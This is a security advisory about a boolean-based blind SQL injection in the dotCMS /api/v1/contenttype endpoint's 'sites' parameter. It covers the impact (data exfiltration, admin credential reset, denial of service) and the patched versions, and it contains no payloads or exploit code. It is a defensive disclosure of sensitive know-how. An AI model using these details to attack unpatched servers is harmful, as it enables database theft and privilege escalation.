dotCMS Boolean-Based Blind SQL Injection Vulnerability in ContentType API Endpoint

A Boolean-based blind SQL injection vulnerability has been identified in the dotCMS ContentType API endpoint (/api/v1/contenttype) for versions 24.03.22 and later. The vulnerability arises from the sites query parameter, which accepts a comma-separated list of site identifiers. This parameter is directly concatenated into a SQL query without proper sanitization, allowing authenticated attackers with low privileges to extract data from the database, escalate privileges, or cause denial-of-service conditions. The vulnerability was verified using SQLMap, demonstrating the potential for full database exfiltration and disruption of service through crafted payloads.

Impact

Exploitation of this vulnerability allows for Boolean-based blind SQL injection, enabling attackers to exfiltrate database information, including user account hashes, reset admin credentials to escalate privileges, and cause denial-of-service by overloading the database with recursive SQL queries.

Remediation

Users are advised to upgrade to dotCMS versions 25.08.14, 25.07.10-1v2 LTS, 24.12.27v10 LTS, or 24.04.24v21 LTS. The patch includes proper parameterized query handling for the sites input, input validation and sanitation to eliminate injection vectors, and additional Web Application Firewall filtering rules to detect suspicious SQL-related input patterns.